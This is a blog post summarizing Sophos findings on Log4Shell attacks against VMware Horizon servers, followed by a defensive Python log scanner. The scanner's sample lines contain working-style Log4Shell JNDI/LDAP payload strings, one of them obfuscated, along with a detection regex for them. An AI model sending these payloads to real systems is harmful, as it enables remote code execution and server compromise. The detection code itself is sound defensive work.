Log4Shell Exploited To Infect VMware Horizon Instances

Last year, I wrote about Log4Shell being actively exploited by threat actors to deliver malware and crypto miners. And that trend appears to be continuing as Sophos researchers warned today that Log4Shell is being exploited to infect VMware Horizon servers with backdoors and crypto miners. According to the report, the Log4Shell attacks target unpatched VMware Horizon with three different backdoors and four cryptocurrency miners.

In late December 2021 and in January 2022, there were multiple reports of active exploitation of the Log4Shell vulnerability in VMware Horizon servers. The attack used the Lightweight Directory Access Protocol resource call of Log4J to retrieve a malicious Java class file that modified existing legitimate Java code, adding a web shell that provided remote access and code execution to the attackers. SophosLabs has observed these attacks in customer telemetry since the beginning of January.

The attempts to leverage Horizon, which continued and grew in number throughout January, were frequently associated with attempts to deploy cryptocurrency mining malware; others had less clear motives, and may be associated with initial access brokers or ransomware actors. These attacks continue.

So in short, you need to patch all the things to protect yourself… But:

Attempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature. VMware has pushed out patched versions of Horizon as of March 8 2022, but many organizations may still not have deployed the fixed versions or applied workarounds to vulnerable ones. Even if they have, as demonstrated by the backdoors and reverse shell activity we found, those systems may already be compromised in other ways.

That’s not good. I have a comment on this from Saryu Nayyar, CEO and Founder of Gurucul:

“Similar to Cobalt Strike, this is an example of an assessment tool being weaponized by threat actors to breach organizations. It is critical to employ self-training machine learning and behavioral models to identify exploitation of the exposed vulnerability as well as detect the remote surveillance done by the attackers. Current XDR and traditional SIEM solutions, even with claims of User Entity Behavior Analytics rooted in known patterns and rule-based artificial intelligence, are unable to adapt to these methods. Organizations need to invest in solutions that employ transparent non rule-based machine learning models to more rapidly identify new attacks.”

So not only should you patch everything that runs VMware Horizon, but you should also go over your infrastructure with a fine-tooth comb because the bad guys may already be in the door.
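As an added example (not from the Sophos report or this post), here is a small Python scanner showing the kind of log review that "fine-tooth comb" implies: it collapses the nested `${lower:}` / `${::-}` lookup obfuscations that Log4j evaluates before making the LDAP call described above, then flags any access-log line that still carries a JNDI lookup. The log lines and IP addresses are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the Sophos report). The two
# marked lines carry the public ${jndi:...} lookup string, plain and obfuscated.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2022:12:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Jan/2022:12:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.1:1389/a}"',
    '10.0.0.9 - - [10/Jan/2022:12:00:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${::-n}${env:NOPE:-d}i:ldap://198.51.100.2/x}"',
]

INNERMOST = re.compile(r"\$\{([^${}]*)\}")  # a lookup with nothing nested inside it
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:", re.I)

def _resolve(match):
    """Evaluate one innermost Log4j 2 lookup the way Log4j would before the JNDI call."""
    body = match.group(1)
    if ":-" in body:                       # ${name:-default}: an unset name yields the default
        return body.split(":-", 1)[1]
    if body[:6].lower() == "lower:":
        return body[6:].lower()
    if body[:6].lower() == "upper:":
        return body[6:].upper()
    return match.group(0)                  # unknown lookup: keep it, so the loop can stop

def normalize_lookups(text):
    """Collapse nested/obfuscated ${...} lookups until nothing more resolves."""
    text = unquote(text)                   # also undo URL encoding in the request line
    while True:
        resolved = INNERMOST.sub(_resolve, text)
        if resolved == text:
            return text
        text = resolved

def scan_log(lines):
    """Return one hit per line that still contains a JNDI lookup after normalization."""
    hits = []
    for number, line in enumerate(lines, 1):
        normalized = normalize_lookups(line)
        m = JNDI.search(normalized)
        if m:
            end = normalized.find("}", m.start())
            hits.append({"line": number, "source_ip": line.split(" ", 1)[0],
                         "lookup": normalized[m.start():end + 1]})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A hit on a Horizon host's logs is only the inbound attempt; the post's point is that the follow-on web shell or miner may already be present, so a hit should trigger a host review, not just a block.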
